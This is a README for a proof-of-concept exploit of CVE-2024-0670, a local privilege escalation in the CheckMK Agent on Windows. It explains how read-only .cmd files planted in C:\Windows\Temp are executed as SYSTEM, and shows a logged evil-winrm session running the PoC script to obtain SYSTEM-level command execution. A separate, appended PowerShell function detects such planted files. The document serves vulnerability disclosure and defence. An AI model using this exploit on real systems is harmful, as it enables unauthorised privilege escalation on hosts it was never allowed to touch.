CVE-2024-0670 PoC
This repository provides a Proof of Concept (PoC) exploit for the CVE-2024-0670 vulnerability, affecting the CheckMK Agent on Windows systems. The vulnerability occurs when the CheckMK Agent creates and executes temporary files in the C:\Windows\Temp directory. An attacker can abuse this behavior by pre-positioning malicious files in that directory with write protection. When the agent attempts to create a temporary file that already exists as read-only, it fails to overwrite it but still executes the existing file with SYSTEM privileges, enabling privilege escalation.
Advisory Reference: SEC Consult - Local Privilege Escalation via writable files in Checkmk Agent
This project is intended for educational, research, and authorized security testing purposes only.
Do not use this code on systems you do not own or have explicit permission to test.
The author is not responsible for any damage or misuse.
evil-winrm-py PS C:\Users\magicrc\Desktop> .\CVE-2024-0670.ps1 -MinPID 1000 -MaxPID 10000 -Cmd "whoami > C:\Windows\Temp\whoami.txt"
[+] Searching for Check MK installer...
[+] Found: C:\Windows\Installer\1e6f2.msi
[+] Using command: whoami > C:\Windows\Temp\whoami.txt
[+] Preparing 18000 .cmd files...
[*] Progress: 0%
[*] Progress: 10%
[*] Progress: 20%
[*] Progress: 30%
[*] Progress: 40%
[*] Progress: 50%
[*] Progress: 60%
[*] Progress: 70%
[*] Progress: 80%
[*] Progress: 90%
[*] Progress: 100%
[+] Triggering MSI to execute command...
[+] Done
evil-winrm-py PS C:\Users\magicrc\Desktop> cat C:\Windows\Temp\whoami.txt
nt authority\system
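A defender-side check for the condition described above, added here as an example and not part of this repository's PoC: it lists read-only .cmd files in C:\Windows\Temp and reports who owns them and when they were created. The function name, the bulk threshold and the trusted-owner heuristic (files owned by the SYSTEM or Administrators SIDs are treated as expected) are assumptions.

```powershell
# Added example, not part of the PoC: triage a temp directory for read-only
# .cmd files, the pre-positioning condition described for CVE-2024-0670.
function Find-ReadOnlyCmdFiles {
    param(
        [string]$Path = 'C:\Windows\Temp',
        [int]$BulkThreshold = 100    # assumed cut-off, tune per environment
    )
    # Well-known SIDs (locale independent): LocalSystem, BUILTIN\Administrators
    $trusted = 'S-1-5-18', 'S-1-5-32-544'

    $hits = @(
        Get-ChildItem -LiteralPath $Path -Filter '*.cmd' -File -Force -ErrorAction SilentlyContinue |
            Where-Object { $_.IsReadOnly } |
            ForEach-Object {
                $file = $_
                # Resolve the owner as a SID; mark files whose ACL cannot be read
                $sid = try {
                    $acl = Get-Acl -LiteralPath $file.FullName -ErrorAction Stop
                    $acl.GetOwner([System.Security.Principal.SecurityIdentifier]).Value
                } catch { 'unreadable' }
                [pscustomobject]@{
                    Name      = $file.Name
                    OwnerSid  = $sid
                    CreatedAt = $file.CreationTimeUtc
                }
            }
    )

    # Heuristic (assumption): read-only scripts owned by anyone else deserve a look
    $foreign = @($hits | Where-Object { $trusted -notcontains $_.OwnerSid })
    $times   = $hits | Measure-Object -Property CreatedAt -Minimum -Maximum

    [pscustomobject]@{
        Path          = $Path
        ReadOnlyCmd   = $hits.Count
        ForeignOwned  = $foreign.Count
        FirstCreated  = $times.Minimum     # a narrow window with a high count
        LastCreated   = $times.Maximum     # suggests files were mass-created
        BulkSuspected = ($hits.Count -ge $BulkThreshold)
        Samples       = $foreign | Sort-Object CreatedAt | Select-Object -First 5
    }
}

Find-ReadOnlyCmdFiles | Format-List
```

Run it from an elevated session so the owner of every file can be read.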